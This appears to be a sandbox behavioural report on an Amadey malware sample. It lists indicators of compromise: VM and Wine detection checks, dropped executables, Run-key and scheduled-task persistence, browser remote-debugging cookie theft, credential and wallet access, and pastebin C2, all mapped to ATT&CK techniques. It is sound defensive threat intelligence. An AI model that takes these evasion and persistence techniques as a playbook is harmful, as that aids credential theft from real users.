amadey | 5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempB4GSONMT2Q6M432B6XXEGMPQ4WU4YN50.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rXOl0pp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	QN45JW4QW9E4TVWGZ5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rXOl0pp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	FvbuInU.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e1f68e263b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ILqcVeT.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
107	5592	powershell.exe
115	5732	powershell.exe
240	5408	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
340	powershell.exe
1608	powershell.exe
2340	powershell.exe
4672	powershell.exe
5408	powershell.exe
5916	powershell.exe
5732	powershell.exe
5408	powershell.exe
5592	powershell.exe

Downloads MZ/PE file 41 IoCs

flow	pid	Process
115	5732	powershell.exe
55	4244	rapes.exe
55	4244	rapes.exe
194	5444	ILqcVeT.exe
194	5444	ILqcVeT.exe
194	5444	ILqcVeT.exe
194	5444	ILqcVeT.exe
194	5444	ILqcVeT.exe
194	5444	ILqcVeT.exe
194	5444	ILqcVeT.exe
212	4244	rapes.exe
212	4244	rapes.exe
212	4244	rapes.exe
212	4244	rapes.exe
212	4244	rapes.exe
39	3092	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe
71	3060	ILqcVeT.exe
71	3060	ILqcVeT.exe
71	3060	ILqcVeT.exe
71	3060	ILqcVeT.exe
71	3060	ILqcVeT.exe
71	3060	ILqcVeT.exe
71	3060	ILqcVeT.exe
121	5264	rXOl0pp.exe
121	5264	rXOl0pp.exe
121	5264	rXOl0pp.exe
121	5264	rXOl0pp.exe
121	5264	rXOl0pp.exe
121	5264	rXOl0pp.exe
121	5264	rXOl0pp.exe
135	4244	rapes.exe
135	4244	rapes.exe
135	4244	rapes.exe
147	2584	rXOl0pp.exe
147	2584	rXOl0pp.exe
147	2584	rXOl0pp.exe
147	2584	rXOl0pp.exe
147	2584	rXOl0pp.exe
147	2584	rXOl0pp.exe
147	2584	rXOl0pp.exe
107	5592	powershell.exe

Uses browser remote debugging 2 TTPs 45 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
6048	chrome.exe
3256	chrome.exe
4460	chrome.exe
5344	chrome.exe
4072	chrome.exe
5624	chrome.exe
3872	chrome.exe
5768	msedge.exe
5860	msedge.exe
5856	msedge.exe
3960	chrome.exe
3468	msedge.exe
4656	msedge.exe
5412	msedge.exe
2396	msedge.exe
5780	chrome.exe
4332	chrome.exe
5696	chrome.exe
2708	chrome.exe
2624	chrome.exe
2364	chrome.exe
5724	chrome.exe
2076	chrome.exe
5392	chrome.exe
5848	msedge.exe
6116	chrome.exe
5544	chrome.exe
1624	chrome.exe
5440	msedge.exe
2480	msedge.exe
5736	chrome.exe
5272	msedge.exe
5764	chrome.exe
692	msedge.exe
5612	msedge.exe
2840	msedge.exe
5256	msedge.exe
968	msedge.exe
5084	chrome.exe
5984	msedge.exe
5536	msedge.exe
5812	msedge.exe
2076	chrome.exe
5592	chrome.exe
3256	msedge.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/files/0x0011000000023e35-2225.dat	net_reactor
behavioral2/memory/5816-2233-0x00000000006F0000-0x0000000000750000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 28 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempB4GSONMT2Q6M432B6XXEGMPQ4WU4YN50.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rXOl0pp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e1f68e263b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rXOl0pp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rXOl0pp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempB4GSONMT2Q6M432B6XXEGMPQ4WU4YN50.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rXOl0pp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e1f68e263b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	QN45JW4QW9E4TVWGZ5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	QN45JW4QW9E4TVWGZ5.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	QN45JW4QW9E4TVWGZ5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	nhDLtPT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation	PcAIvJ0.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	zY9sqWs.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	zY9sqWs.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs	powershell.exe

Executes dropped EXE 26 IoCs

pid	Process
4044	QN45JW4QW9E4TVWGZ5.exe
4244	rapes.exe
3060	ILqcVeT.exe
3040	rapes.exe
4944	f903d42ec8.exe
1900	TempB4GSONMT2Q6M432B6XXEGMPQ4WU4YN50.EXE
2584	rXOl0pp.exe
5264	rXOl0pp.exe
4732	483d2fa8a0d53818306efeb32d3.exe
5444	ILqcVeT.exe
3356	nhDLtPT.exe
2512	Gxtuum.exe
6080	Ps7WqSx.exe
2068	rapes.exe
5368	Gxtuum.exe
6000	FvbuInU.exe
5816	mAtJWNv.exe
1708	mAtJWNv.exe
968	ce4pMzk.exe
3400	MCxU5Fj.exe
5540	MCxU5Fj.exe
2204	MCxU5Fj.exe
392	v6Oqdnc.exe
6136	PcAIvJ0.exe
1380	zY9sqWs.exe
5944	e1f68e263b.exe

Identifies Wine through registry keys 2 TTPs 14 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	FvbuInU.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	v6Oqdnc.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	e1f68e263b.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	ILqcVeT.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	TempB4GSONMT2Q6M432B6XXEGMPQ4WU4YN50.EXE
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	rXOl0pp.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	rXOl0pp.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	ILqcVeT.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe
Key opened	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine	QN45JW4QW9E4TVWGZ5.exe

Loads dropped DLL 8 IoCs

pid	Process
3060	ILqcVeT.exe
3060	ILqcVeT.exe
5264	rXOl0pp.exe
5264	rXOl0pp.exe
2584	rXOl0pp.exe
2584	rXOl0pp.exe
5444	ILqcVeT.exe
5444	ILqcVeT.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f903d42ec8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109460101\\f903d42ec8.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109470121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\ologEXCB\\Anubis.exe\""	ce4pMzk.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
273	pastebin.com
274	pastebin.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000b000000023c09-114.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs

pid	Process
3092	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe
4044	QN45JW4QW9E4TVWGZ5.exe
4244	rapes.exe
3060	ILqcVeT.exe
3040	rapes.exe
1900	TempB4GSONMT2Q6M432B6XXEGMPQ4WU4YN50.EXE
2584	rXOl0pp.exe
5264	rXOl0pp.exe
4732	483d2fa8a0d53818306efeb32d3.exe
5444	ILqcVeT.exe
2068	rapes.exe
6000	FvbuInU.exe
392	v6Oqdnc.exe
5944	e1f68e263b.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 5816 set thread context of 1708	5816	mAtJWNv.exe	236
PID 3400 set thread context of 5540	3400	MCxU5Fj.exe	268

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	QN45JW4QW9E4TVWGZ5.exe
File created	C:\Windows\Tasks\Gxtuum.job	nhDLtPT.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2820	5816	WerFault.exe	235
5592	3400	WerFault.exe	266

System Location Discovery: System Language Discovery 1 TTPs 36 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f903d42ec8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e1f68e263b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempB4GSONMT2Q6M432B6XXEGMPQ4WU4YN50.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rXOl0pp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FvbuInU.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zY9sqWs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nhDLtPT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rXOl0pp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ps7WqSx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	QN45JW4QW9E4TVWGZ5.exe

Checks processor information in registry 2 TTPs 22 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rXOl0pp.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rXOl0pp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mAtJWNv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rXOl0pp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rXOl0pp.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
5424	timeout.exe

Enumerates system info in registry 2 TTPs 35 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133857073265712657"	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5208	schtasks.exe
5348	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3092	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe
3092	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe
3092	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe
3092	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe
3092	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe
3092	5f151b2d514a198ccadfbf3fb2774389214400dc70a6534849e22e6f605e6f67.exe
4044	QN45JW4QW9E4TVWGZ5.exe
4044	QN45JW4QW9E4TVWGZ5.exe
4244	rapes.exe
4244	rapes.exe
3060	ILqcVeT.exe
3060	ILqcVeT.exe
3060	ILqcVeT.exe
3060	ILqcVeT.exe
3040	rapes.exe
3040	rapes.exe
3060	ILqcVeT.exe
3060	ILqcVeT.exe
3256	chrome.exe
3256	chrome.exe
5592	powershell.exe
5592	powershell.exe
5592	powershell.exe
3060	ILqcVeT.exe
3060	ILqcVeT.exe
3060	ILqcVeT.exe
3060	ILqcVeT.exe
5192	msedge.exe
5192	msedge.exe
6000	msedge.exe
6000	msedge.exe
6000	msedge.exe
6000	msedge.exe
5984	msedge.exe
5984	msedge.exe
340	powershell.exe
340	powershell.exe
340	powershell.exe
1608	powershell.exe
1608	powershell.exe
1608	powershell.exe
3060	ILqcVeT.exe
3060	ILqcVeT.exe
2340	powershell.exe
2340	powershell.exe
2340	powershell.exe
